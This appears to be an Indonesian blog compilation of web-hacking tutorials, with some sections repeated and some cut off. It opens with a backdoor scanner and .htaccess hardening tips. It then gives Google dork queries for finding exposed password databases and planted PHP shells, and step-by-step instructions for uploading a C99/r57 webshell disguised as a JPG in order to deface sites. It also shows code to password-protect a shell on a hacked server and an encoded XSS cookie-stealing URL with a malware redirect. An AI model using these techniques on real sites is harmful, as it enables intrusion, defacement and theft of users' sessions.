Sekedar untuk share kembali,scan backdoor yang mungkin akan berguna bagi Admin web untuk scanning kemungkinan adanya malscript atau web shell yang disisipkan oleh heker ke dalam situs.
Penggunaannya cukup mudah. upload ke hosting anda dan ceklis beberapa opsi yang diperlukan. misalnya ceklis kolom "other keyword" dan isi dengan nama keyword c99.php , execute, upload atau keyword lain yg dicurigai sebagai malscript. lalu klik "start scan". maka Backdoor scanner ini akan memeriksa file di host yang memuat keyword tersebut. Jika ditemukan, maka akan ditampilkan.
Perlu ditambahkan juga bahwa tidak semua file yang ditampilkan merupakan backdoor, anda juga perlu langsung memeriksanya kembali isi script yang telah terdeteksi.
Penggunaanya pun sangat simple
1.download dulu scannernya lalu upload di file manager hosting kalian
2.panggil directory dimana anda mengupload tadi semisial :/: http/situs anda/files/includes/backdoorscan.php
3.pilih mode scan backdoor lalu klik start scanner
4.Lalu tunggu hingga scan selesai
alhasil ditemukan letak shell backdoor yang selama ini meresahkan admin
semoga berguna.
Penggunaannya cukup mudah. upload ke hosting anda dan ceklis beberapa opsi yang diperlukan. misalnya ceklis kolom "other keyword" dan isi dengan nama keyword c99.php , execute, upload atau keyword lain yg dicurigai sebagai malscript. lalu klik "start scan". maka Backdoor scanner ini akan memeriksa file di host yang memuat keyword tersebut. Jika ditemukan, maka akan ditampilkan.
Perlu ditambahkan juga bahwa tidak semua file yang ditampilkan merupakan backdoor, anda juga perlu langsung memeriksanya kembali isi script yang telah terdeteksi.
Penggunaanya pun sangat simple
1.download dulu scannernya lalu upload di file manager hosting kalian
2.panggil directory dimana anda mengupload tadi semisial :/: http/situs anda/files/includes/backdoorscan.php
3.pilih mode scan backdoor lalu klik start scanner
4.Lalu tunggu hingga scan selesai
alhasil ditemukan letak shell backdoor yang selama ini meresahkan admin
semoga berguna.
di sini saya akan memberikan sedikit clue or beberapa tips untuk mencegah Local File Inclusion Vulnerability in our website
langsung saja ini beberapa tips to handle local fie inclusion :via .htaccess file INGAT YAA . .
====================================
Put following in .htaccess and
put it in the appropriate directory
====================================
# Sample '.htaccess' file for 'pub' subdirectory
# Allow all access
Allow from all
# Deny people from looking at the index and running SSI and CGI
Options None
# If you have PHP4 or PHP5 installed make sure the directive
# below is enabled. If you do not have PHP installed you will
# need to comment out the directory below to avoid errors:
php_flag engine off
# If you have PHP3 installed make sure the directive below is
# enabled:
#php3_engine off
# This line will redefine the mime type for the most common
# types of scripts. It will also deliver HTML files as if they
# are text files:
AddType text/plain .html .htm .shtml .php .php3 .php5 .phtml .phtm .pl .py .cgi
===========================
-=[2]=- Via Directory directive
===========================
<DirectoryMatch "/images|/upload|/Upload|/Images">
# Ignore .htaccess files
AllowOverride None
# Serve scripts as plaintext
AddType text/plain .html .htm .shtml .php .php3 .php5 .phtml .phtm .pl .py .cgi
# Don't run arbitrary PHP code.
php_admin_flag engine off
</DirectoryMatch>
==========================
-=[3]=- Via Location directive
==========================
<LocationMatch "/images|/upload">
# Ignore .htaccess files
AllowOverride None
# Serve scripts as plaintext
AddType text/plain .html .htm .shtml .php .php3 .php5 .phtml .phtm .pl .py .cgi
# Don't run arbitrary PHP code.
php_admin_flag engine off
</Location>
===========================
Jika ada yg kurang Mohon di tambahkan , maklum no body`s perfect :)

If any something wrong feel free to correction or give critic . :)
langsung saja ini beberapa tips to handle local fie inclusion :via .htaccess file INGAT YAA . .
====================================
Put following in .htaccess and
put it in the appropriate directory
====================================
# Sample '.htaccess' file for 'pub' subdirectory
# Allow all access
Allow from all
# Deny people from looking at the index and running SSI and CGI
Options None
# If you have PHP4 or PHP5 installed make sure the directive
# below is enabled. If you do not have PHP installed you will
# need to comment out the directory below to avoid errors:
php_flag engine off
# If you have PHP3 installed make sure the directive below is
# enabled:
#php3_engine off
# This line will redefine the mime type for the most common
# types of scripts. It will also deliver HTML files as if they
# are text files:
AddType text/plain .html .htm .shtml .php .php3 .php5 .phtml .phtm .pl .py .cgi
===========================
-=[2]=- Via Directory directive
===========================
<DirectoryMatch "/images|/upload|/Upload|/Images">
# Ignore .htaccess files
AllowOverride None
# Serve scripts as plaintext
AddType text/plain .html .htm .shtml .php .php3 .php5 .phtml .phtm .pl .py .cgi
# Don't run arbitrary PHP code.
php_admin_flag engine off
</DirectoryMatch>
==========================
-=[3]=- Via Location directive
==========================
<LocationMatch "/images|/upload">
# Ignore .htaccess files
AllowOverride None
# Serve scripts as plaintext
AddType text/plain .html .htm .shtml .php .php3 .php5 .phtml .phtm .pl .py .cgi
# Don't run arbitrary PHP code.
php_admin_flag engine off
</Location>
===========================
Jika ada yg kurang Mohon di tambahkan , maklum no body`s perfect :)
If any something wrong feel free to correction or give critic . :)
mungkin pada tau yg beginian atou mungkin blm ada yg tau...
so to the point aj ya...!
berikut tutornya
Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari ribuan website tampilan utamanya berubah. Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik dengan menggunakan Google.
01. Penggunaan Dasar
- Google tidak "case sensitive".
Keyword: linux = LINUX = LiNuX, Akan menghasilkan hal yang sama
- AND: Secara Default Google menggunakan keyword and. Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata "menjadi" dan "hacker"
- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah satu dari keyword. Note: OR dituliskan dengan huruf besar semua. Keyword: hacker OR cracker
Hasilnya pencarian akan mengandung kata "hacker" atau "cracker"
- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
"how" dan "where". Jika kata-kata umum ini begitu penting, anda bisa menambahkan "+" didepan keyword tersebut.
Keyword: hacker how ==> Kata "how" akan diabaikan
Keyword: hacker +how ==> Kata "how" akan diikutsertakan
- -: Tanda minus "-" bisa digunakan utk mengecualikan kata tertentu dalam pencarian. Misal kita ingin mencari kata "linus tanpa linux", kita bisa menggunakan "linus -linux"
- *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan menja* Google tidak mencari kata "menjamu", "menjadi", "menjalar", dll. Google akan menghasilkan pencarian hanya yang mengandung kata "menja". Tetapi google mendukung penggunaan * dalam pencarian kalimat. Keyword: "menjadi * hacker". Hasilnya pencarian dapat menghasilkan "menjadi seorang hacker", "menjadi white hacker", dll.
- "": Dapat digunakan untuk mencari kata yg lengkap. Keyword: "menjadi hacker"
Hasilnya pencarian akan mengandung kata "menjadi hacker"
- ?: Dapat digunakan untuk mencari pada direktori Google
Keyword: ?intitle:index.of? mp3
02. Operator Spesial
- intitle: Untuk mencari kata-kata dari judul suatu halaman web. Keyword: intitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman "Admin" dengan deskripsi "Administrasi"
- allintitle: Untuk mencari kata-kata dari judul halaman web secara lengkap. Keyword: allintitle:Admin Administrasi Keyword tersebut akan mencari judul halaman yang mengandung kata "Admin" dan "Administrasi"
- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata tertentu. Keyword: inurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin"
dengan deskripsi "Administrasi"
- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata tertentu. Keyword: allinurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin" dan "Administrasi"
- site: Untuk mencari dalam suatu situs tertentu saja
Keyword: site:echo.or.id
Semua pencarian hanya berdasarkan site "echo.or.id"
- cache: Ketika Googlebot mengindeks suatu situs, google akan mengambil snapshot dari semua halaman yang telah terindeks. Operator ini membantu melihat halaman-halaman yang telah dicache. Keyword: cache:echo.or.id
Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya pada snapshot/cache yang disimpan oleh Google.
- define: Operator ini digunakan untuk mencari definisi dari frasa tertentu. Semua kata yang diketik setelah operator ini akan diperlakukan sebagai satu frasa.
Keyword: define:hacker
- filetype: Jika kita mencari jenis file tertentu yang berisi informasi yang anda inginkan kita bisa
menggunakan operator ini. Keyword: "hacker" filetype:pdf. Sampai tulisan ini dibuat google support tipe file
# Adobe Portable Document Format (pdf)
# Adobe PostScript (ps)
# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
# Lotus WordPro (lwp)
# MacWrite (mw)
# Microsoft Excel (xls)
# Microsoft PowerPoint (ppt)
# Microsoft Word (doc)
# Microsoft Works (wks, wps, wdb)
# Microsoft Write (wri)
# Rich Text Format (rtf)
# Shockwave Flash (swf)
# Text (ans, txt)
Ref: http://www.google.com/help/faq_filetypes.html
- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa menggunakan operator link. Keyword: link:www.google.com
- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu. Keyword: related:www.google.com
03. Tips & Tricks
Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan operator tersebut. Contoh:
- Keyword: site:echo.or.id, menghasilkan semua site echo.or.id. Kemudian anda bisa mencoba keyword:
site:echo.or.id hacker, akan menghasilkan semua site echo.or.id yang mengandung kata hacker.
Kita juga dapat melakukan pencarian secara spesifik melalui google. Untuk melakukannya anda dapat ke site berikut:
- http://www.google.com/bsd
- http://www.google.com/mac
- http://www.google.com/linux
- http://www.google.com/microsoft
- http://www.google.com/univ/education
Berbagai trik keyword pada Google:
parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
intitle:index of intitle:mp3 -html -htm name size intitle:index of intitle:video -html -htm name size
intitle:index of intitle:cgi-bin passwd -html -htm name size intitle:index of intitle:cgi-bin password -html -htm name size
inurl:"admin.mdb" -html inurl:"password.mdb" -html
inurl:"data.mdb" -html
"phpMyAdmin" "running on" inurl:"main.php"
intitle:"PHP Shell" "Enable stderr" php
so to the point aj ya...!
berikut tutornya
Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari ribuan website tampilan utamanya berubah. Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik dengan menggunakan Google.
01. Penggunaan Dasar
- Google tidak "case sensitive".
Keyword: linux = LINUX = LiNuX, Akan menghasilkan hal yang sama
- AND: Secara Default Google menggunakan keyword and. Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata "menjadi" dan "hacker"
- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah satu dari keyword. Note: OR dituliskan dengan huruf besar semua. Keyword: hacker OR cracker
Hasilnya pencarian akan mengandung kata "hacker" atau "cracker"
- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
"how" dan "where". Jika kata-kata umum ini begitu penting, anda bisa menambahkan "+" didepan keyword tersebut.
Keyword: hacker how ==> Kata "how" akan diabaikan
Keyword: hacker +how ==> Kata "how" akan diikutsertakan
- -: Tanda minus "-" bisa digunakan utk mengecualikan kata tertentu dalam pencarian. Misal kita ingin mencari kata "linus tanpa linux", kita bisa menggunakan "linus -linux"
- *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan menja* Google tidak mencari kata "menjamu", "menjadi", "menjalar", dll. Google akan menghasilkan pencarian hanya yang mengandung kata "menja". Tetapi google mendukung penggunaan * dalam pencarian kalimat. Keyword: "menjadi * hacker". Hasilnya pencarian dapat menghasilkan "menjadi seorang hacker", "menjadi white hacker", dll.
- "": Dapat digunakan untuk mencari kata yg lengkap. Keyword: "menjadi hacker"
Hasilnya pencarian akan mengandung kata "menjadi hacker"
- ?: Dapat digunakan untuk mencari pada direktori Google
Keyword: ?intitle:index.of? mp3
02. Operator Spesial
- intitle: Untuk mencari kata-kata dari judul suatu halaman web. Keyword: intitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman "Admin" dengan deskripsi "Administrasi"
- allintitle: Untuk mencari kata-kata dari judul halaman web secara lengkap. Keyword: allintitle:Admin Administrasi Keyword tersebut akan mencari judul halaman yang mengandung kata "Admin" dan "Administrasi"
- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata tertentu. Keyword: inurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin"
dengan deskripsi "Administrasi"
- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata tertentu. Keyword: allinurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin" dan "Administrasi"
- site: Untuk mencari dalam suatu situs tertentu saja
Keyword: site:echo.or.id
Semua pencarian hanya berdasarkan site "echo.or.id"
- cache: Ketika Googlebot mengindeks suatu situs, google akan mengambil snapshot dari semua halaman yang telah terindeks. Operator ini membantu melihat halaman-halaman yang telah dicache. Keyword: cache:echo.or.id
Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya pada snapshot/cache yang disimpan oleh Google.
- define: Operator ini digunakan untuk mencari definisi dari frasa tertentu. Semua kata yang diketik setelah operator ini akan diperlakukan sebagai satu frasa.
Keyword: define:hacker
- filetype: Jika kita mencari jenis file tertentu yang berisi informasi yang anda inginkan kita bisa
menggunakan operator ini. Keyword: "hacker" filetype:pdf. Sampai tulisan ini dibuat google support tipe file
# Adobe Portable Document Format (pdf)
# Adobe PostScript (ps)
# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
# Lotus WordPro (lwp)
# MacWrite (mw)
# Microsoft Excel (xls)
# Microsoft PowerPoint (ppt)
# Microsoft Word (doc)
# Microsoft Works (wks, wps, wdb)
# Microsoft Write (wri)
# Rich Text Format (rtf)
# Shockwave Flash (swf)
# Text (ans, txt)
Ref: http://www.google.com/help/faq_filetypes.html
- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa menggunakan operator link. Keyword: link:www.google.com
- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu. Keyword: related:www.google.com
03. Tips & Tricks
Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan operator tersebut. Contoh:
- Keyword: site:echo.or.id, menghasilkan semua site echo.or.id. Kemudian anda bisa mencoba keyword:
site:echo.or.id hacker, akan menghasilkan semua site echo.or.id yang mengandung kata hacker.
Kita juga dapat melakukan pencarian secara spesifik melalui google. Untuk melakukannya anda dapat ke site berikut:
- http://www.google.com/bsd
- http://www.google.com/mac
- http://www.google.com/linux
- http://www.google.com/microsoft
- http://www.google.com/univ/education
Berbagai trik keyword pada Google:
parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
intitle:index of intitle:mp3 -html -htm name size intitle:index of intitle:video -html -htm name size
intitle:index of intitle:cgi-bin passwd -html -htm name size intitle:index of intitle:cgi-bin password -html -htm name size
inurl:"admin.mdb" -html inurl:"password.mdb" -html
inurl:"data.mdb" -html
"phpMyAdmin" "running on" inurl:"main.php"
intitle:"PHP Shell" "Enable stderr" php
Mungkin banyak dari kita yang sudah tau apa itu webshell ? WebShell (PHP Shell), itu sebuah aplikasi berbasis php, yg dipake user untuk berinteraksi dengan server sistem. Kalo web shell, shell yg ditulis dalam bahasa pemrograman web (seperti R57, C99, dsb) untuk memudahkan eksplorasi terhadap suatu web yg memliki bug.
Tamper Data adalah salah satu add-ons pada Mozilla yang berguna dalam web-hacking. Cara kerja Tamper Data adalah dengan memanipulasi sistem pengiriman data pada web (method POST). Method POST ini adalah sebuah fungsi Javascript yang aktif ketika kita meng-klik tombol submit atau sejenisnya. Pada saat tombol tersebut di klik maka sistem akan mengirimkan sebuah value/nilai yang akan menentukan hasil dari klik yang kita lakukan.
Oleh karena itu Method POST ini terkadang menjadi salah satu kelemah sebuah sistem website, karena kita bisa mengubah data yang akan dikirim. Tamper Data memungkinkan kita mengubah value/nilai dari method POST tersebut.
Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau fasilitasnya hanya untuk upload file.jpg gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit
1. Siapakan dulu file shell.php seperti : C99Shell, r57, atau b374k bisa di download di Shell backdoor
2. Rename dengan nama : shell.php.jpg
3. Install add ons Tamper Data dulu di browser mozilla kita
4. Restart dan kita mulai upload
5. cari login admin sebuah website disini saya anggap kalian sudah punya login sebagai admin Lnacjut
6. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan
7. Trus Uploads shell.php.jpg kita dan tamper
8. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah
Sekarang anda tinggal cari dimana file shell anda berada .
Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget,dan berhasil deh webshellnya sudah tertanam sekarang tinggal terserah kalian mau dideface atau cuman liat-liat
gak semua web target bisa kita lakukan dengan tekhnik ini .Kalau gak berhasil , silahkan hubungi adminnya aja langsung
misalnya saya akan memberi password pada shell backdoor c99.php
yang mempunyai script
lalu Masukan script berikut tepat di bawah <?php
// --- pop-upjadinya
$user = "isi-username";
$pass = "isi-password";
if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))
{
header("WWW-Authenticate: Basic realm=\"dvildance was here\"");
header("HTTP/1.0 401 Unauthorized");
exit();
}
// --- php shell
lalu upload di server hasil hack dan panggil shell anda
maka muncul popup password
SUKSES . . .
Note :
Tidak semu host mendukung adanya script pop-up di atas, jadi harap di coba sebelum memberi password pada php shell.Tapi kebanyakan mendukung pop-up
Cross Site Scripting atau biasa dikenal dengan XSS merupakan salah satu vulnerability pada website
yang kerap kali dapat ditemukan pada aplikasi website dan dapat digunakan oleh pihak-pihak yang
tidak bertanggungjawab untuk mengeksekusi code HTML atau javascript pada komputer korban.
Umumnya komputer yang menjadi korban adalah mereka yang mengakses website yang vulnerable.
Tujuan
Tujuan dari peretas mengeksploitasi celah keamanan menggunakan teknik XSS adalah untuk mecuri
cookie yang ada di komputer client (cookie stealing), Melakukan redirection URL dengan maksud
“tertentu” (URL Redirection) melalui teknik kejahatan yang dinamakan phising dan lainnya. Tujuan
lain dari tulisan ini dibuat adalah untuk menambah pemahaman kita tentang serangan dengan
menggunakan XSS dan perbedaan antara teknik yang satu dan lainnya dalam mengeksploitasi
vulnerability XSS.
Jenis-jenis Cross Site Scripting (XSS)
Secara umum, teknik XSS ini dibagi dalam tiga kelompok yaitu DOM Based XSS, Non-persistent XSS
dan Persistent XSS. Penjelasan mengenai ketiga jenis teknik XSS tersebut adalah sebagai berikut
DOM BASED XSS
Dom based XSS terjadi karena adanya kesalahan yang dilakukan oleh programmer ketika
memprogram sebuah file yang disimpan pada local machine yang menjadi target eksploitasi.
Beberapa software third party yang dapat diinstall pada sebuah komputer umumnya melampirkan
sebuah file berbasis HTML yang berisikan README/HELP.
Celah keamanan ini akan diketemukan ketika sebuah software pada local machine tersebut dapat
dieksploitasi oleh peretas. Melakukan eksploitasi pada DOM based XSS umumnya hampir sama
dengan eksploitasi dengan non-persistent XSS.
NON-PERSISTENT XSS
Non-persistent XSS kerap kali ditemui oleh kita pada aplikasi-aplikasi yang berbasis web. Hal ini
terjadi karena ada kesalahan dalam programming yang dilakukan oleh programmer dalam melakukan
filtrasi atas inputan-inputan yang dilakukan oleh user.
Sesuai dengan namanya, akibat yang ditimbulkan oleh serangan jenis ini hanya bersifat sementara
yaitu ketika user mengklik URI yang diberikan. Celah keamanan ini akan umumnya dapat dijumpai
pada website-website yang menyediakan fitur search terhadap sebuah konten.
PERSISTENT XSS
Persistent-XSS terjadi karena kecerobohan dari programmer saat menuliskan kode program yang
tidak melakukan filtrasi terhadap inputan yang diberikan oleh user dan dapat disimpan secara
permanen dalam sebuah website.
Umumnya hal ini terjadi pada aplikasi-aplikasi yang mengizinkan user menyimpan data secara bebas
dalam sebuah website. Aplikasi-aplikasi tersebut diantaranya adalah buku tamu (guestbook), forum
dan aplikasi sejenis lainnya.
Akibat yang ditimbulkan
Umumnya celah keamanan ini akan lebih banyak menimpa client ketimbang server. Misalnya
seperti Cookie Stealing, Session Hijacking, Phising dan lain sebagainya.
Proof of Concept (PoC)
Dibawah ini dapat anda temukan tulisan yang menunjukkan Proof of Concept atau pembuktian dari
sederetan teori yang telah dijelaskan diatas, Pastikan Apache, MySQL dan PHP (AMP) telah terinstall
didalam PC anda sebelum mencoba PoC dibawah ini.
Non-Persistent and DOM XSS Attack
Seperti yang telah dipaparkan sebelumnya serangan DOM XSS dan Non-persistent XSS hampir
sama pola eksploitasinya. Untuk membantu dalam memahami pola serangan tersebut, dibawah ini
sudah di siapkan sebuah contoh code html/php sederhananya.
buat
File: index.html
Anda bayangkan sekarang anda sedang menggunakan search engine layaknya google. Dihalaman
utama google hanya ada sebuah halaman dengan 1 form untuk search dan 1 lagi button submitnya.
Didalam scenario kali ini kita namakan file tersebut adalah index.html. Untuk dapat memproses apa
yang anda inginkan tentunya butuh file yang bertindak sebagai processor. File tersebut dalam
scenario kali ini kita namakan cari.php.
Pada metode passing parameter dari box search di halaman index.html kita memilih untuk
menggunakan metode GET pada http, sehingga parameter yang akan kita kirimkan pada file cari.php
akan terlihat pada kolom url.
Sebagai contoh kita akan mencari “Security” maka
setelah anda tekan tombol Cari di halaman index.html,
anda akan diantarkan pada halaman cari.php dan di
browser akan ada tulisan sebagai berikut: Anda
Sedang mencari dengan kata kunci Security…
Selanjutnya mari kita perhatikan kolom url pada
browser, maka aka nada tulisan sebagai berikut:
http://localhost/cari.php?key=Security.
Jika kita lihat pada source code cari.php, programmer tidak melakukan filtering terhadap inputan yang
diberikan oleh pengguna. Sehingga, apapun yang kalian cantumkan akan dieksekusi oleh php script.
Sekarang, coba kalian ganti kata Security pada url dengan <script>alert(“ih Wow!)</script>. Yang
akan terjadi adalah box alert akan muncul pada browser dengan tulisan “ih Wow!”.
Ketika halaman cari.php dapat melakukan eksekusi terhadap inputan javascript diatas, artinya
halaman website tersebut vulnerable terhadap serangan yang dinamakan XSS. Namun, bagaimana
untuk menggunakan vulnerable XSS ini untuk melakukan kejahatan? Jawaban: dengan
memanfaatkan kode javascript. Berikut beberapa contoh pemanfaat XSS yang populer (Cookie
Stealing, URL Redirection/Phising).
Cookie Stealing
Cookie stealing digunakan untuk mencuri cookie yang ada pada komputer client, yang dapat
dimanfaatkan untuk kejahatan session hijacking dan akhirnya berujung pada login bypass. Untuk
melakukan cookie stealing bisa dilakukan dengan cara sebagai berikut:
Skenario:
Di website http://localhost/xss/ sudah diketemukan bahwa website tersebut memiliki vulnerability xss.
Website ini banyak diakses oleh user diberbagai dunia sehingga, seorang attacker akan melakukan
aksinya guna mencuri cookie yang ada pada computer user.
Langkah awal sang attacker membuat dua file yaitu payload.js dan cookie.php. payload.js adalah file
yang akan di embed kedalam URI website http://localhost/xss/ sedangkan file cookie.php akan
disimpan di dalam server yang dimiliki oleh sang attacker. Dibawah ini dapat ditemukan script yang
dibuat oleh sang attacker untuk mencuri cookie pada computer user.
payload.js
tulisan ini, karena untuk menjelaskannya sendiri membutuhkan waktu yang lumayan lama. Untuk
dapat melakukan pencurian cookie, kita akan melakukan embedding file javascript kedalam URI
sehingga menjadi seperti berikut :
http://localhost/xss/cari.php?key=<script src="http://localhost/cookie/payload.js"></script>
Namun jika URI seperti diatas akan diberikan kepada user, tentunya user akan menaruh kecurigaan.
Sehingga perlu dilakukan encode kedalam bentuk heksadesimal. Untuk melakukan encode ke dalam
hexadecimal, saya menggunakan tools yang telah ada di http://ha.ckers.org/xss.html. URI diatas akan
menjadi seperti berikut ini:
http://localhost/xss/cari.php?key=%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74
%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%2F%63%6F%6F%6B%69%65%2F
%70%61%79%6C%6F%61%64%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E
Sebelum anda melakukan serangan pastikan dua hal dibawah ini:
1. Folder tempat anda menyimpan file cookie nanti dapat ditulis oleh user apache. Pada contoh kali
ini saya meletakkan file cookie didalam folder yang sama dengan script phpnya.
2. Jika webserver anda linux, pastikan user apache diberikan privileges/izin untuk menulis difolder
tersebut. Amannnya di change modenya menjadi Read Write Execute oleh semua user, namun
jangan diletakkan difolder yang dapat diakses melalui website.
Setelah url berhasil di encode dan dilakukan eksekusi oleh user pada browsernya, maka cookie yang
ada di client akan disimpan pada file cookie.txt pada server attacker. Adapun dokumen cookie yang
tersimpan pada server isinya ditunjukkan pada gambar dibawah ini:
URL Redirection
Teknik yang digunakan dalam url redirection hampir sama dengan teknik cookie stealing. Tujuan dari
attacker menggunakan url redirection adalah menginginkan user membuka halaman palsu untuk login
biasa dikenal dengan istilah phising atau menginginkan user mendownload sesuatu ke dalam
komputernya seperti virus, worm, dan sebagainya.
Apa yang harus dimodifikasi dari yang telah kita buat dalam payload.js? yang kita akan modifikasi
adalah file yang akan kita berikan ketika user membuka url yang kita berikan. Untuk lebih
menggambarkan modifikasi tersebut, dapat diperhatikan contoh dibawah ini:
Attacker menginginkan user membuka url dan mendownload wormtail.exe yang merupakan virus
ganas kedalam komputernya. Maka modifikasi yang dilakukan oleh sang attacker dalam file
payload.js adalah
document.location= “http://www.example.com/wormtail.exe”
Persistent XSS Attack
Serangan jenis ini bersifat permanen karena attacker dapat menyimpan codenya kedalam database
website. Sangat sering dijumpai pada website yang ada guestbook ataupun shout box yang dibuat
tanpa memfilter inputan yang diberikan.
Untuk lebih menjelaskan tentang serangan jenis ini, kita akan membuat sebuah aplikasi guestbook
sederhana. Aplikasi ini kemudian diexploit oleh attacker dengan menggunakan teknik persistent XSS
attack.
Untuk membuat aplikasi guestbook ini, kita akan membuat 3 file utama yaitu form
guestbook(guestbook.html), user interface untuk melakukan viewing guestbook(view_guestbook.php),
dan file yang berfungsi untuk menangani proses penyimpanan ke dalam database(guestbook.php).
guestbook.html
<script>alert(‘test’);</script> dan itu akan disimpan permanent di dalam database.
Akibatnya, setiap kali anda akan membuka halaman view_guestbook kotak alert akan selalu keluar
Akibat yang lebih parah dari adanya kerentanan ini adalah cookie stealing. Tekniknya sama seperti
diatas hanya saja kita akan memasukkan payload yang telah kita buat pada non-persistent xss untuk
disimpan pada buku tamu yang kita buat saat ini.
Pencegahan
Pencegahan utama dari vulnerability XSS ini adalah melakukan filter terhadap inputan yang diberikan
user. Tanpa adanya filter input pada aplikasi, vulnerability ini tetap berbahaya.
Pada aplikasi berbasis php gampangnya kita menggunakan fungsi strip_tags() untuk melakukan
filtering terhadap simbol2 inputan user yang dapat menimbulkan xss. Pada script guestbook.php
diatas inputan nama/pesan diubah menjadi berikut
harus belajar cara penulisannya. Cara yang saya maksudkan adalah Regular Expression (RegEx
<baca:regex>). Pada tulisan kali ini saya tidak akan membahas tentang regex, karena membahas
regex sama halnya dengan menuliskan artikel yang baru.
Kesimpulan
Dari apa yang ada pada tulisan ini kesimpulan yang dapat kita ambil adalah Cross Site Scripting tidak
membahayakan server, namun yang menjadi ancaman utama dari serangan ini adalah Client/User.
yang kerap kali dapat ditemukan pada aplikasi website dan dapat digunakan oleh pihak-pihak yang
tidak bertanggungjawab untuk mengeksekusi code HTML atau javascript pada komputer korban.
Umumnya komputer yang menjadi korban adalah mereka yang mengakses website yang vulnerable.
Tujuan
Tujuan dari peretas mengeksploitasi celah keamanan menggunakan teknik XSS adalah untuk mecuri
cookie yang ada di komputer client (cookie stealing), Melakukan redirection URL dengan maksud
“tertentu” (URL Redirection) melalui teknik kejahatan yang dinamakan phising dan lainnya. Tujuan
lain dari tulisan ini dibuat adalah untuk menambah pemahaman kita tentang serangan dengan
menggunakan XSS dan perbedaan antara teknik yang satu dan lainnya dalam mengeksploitasi
vulnerability XSS.
Jenis-jenis Cross Site Scripting (XSS)
Secara umum, teknik XSS ini dibagi dalam tiga kelompok yaitu DOM Based XSS, Non-persistent XSS
dan Persistent XSS. Penjelasan mengenai ketiga jenis teknik XSS tersebut adalah sebagai berikut
DOM BASED XSS
Dom based XSS terjadi karena adanya kesalahan yang dilakukan oleh programmer ketika
memprogram sebuah file yang disimpan pada local machine yang menjadi target eksploitasi.
Beberapa software third party yang dapat diinstall pada sebuah komputer umumnya melampirkan
sebuah file berbasis HTML yang berisikan README/HELP.
Celah keamanan ini akan diketemukan ketika sebuah software pada local machine tersebut dapat
dieksploitasi oleh peretas. Melakukan eksploitasi pada DOM based XSS umumnya hampir sama
dengan eksploitasi dengan non-persistent XSS.
NON-PERSISTENT XSS
Non-persistent XSS kerap kali ditemui oleh kita pada aplikasi-aplikasi yang berbasis web. Hal ini
terjadi karena ada kesalahan dalam programming yang dilakukan oleh programmer dalam melakukan
filtrasi atas inputan-inputan yang dilakukan oleh user.
Sesuai dengan namanya, akibat yang ditimbulkan oleh serangan jenis ini hanya bersifat sementara
yaitu ketika user mengklik URI yang diberikan. Celah keamanan ini akan umumnya dapat dijumpai
pada website-website yang menyediakan fitur search terhadap sebuah konten.
PERSISTENT XSS
Persistent-XSS terjadi karena kecerobohan dari programmer saat menuliskan kode program yang
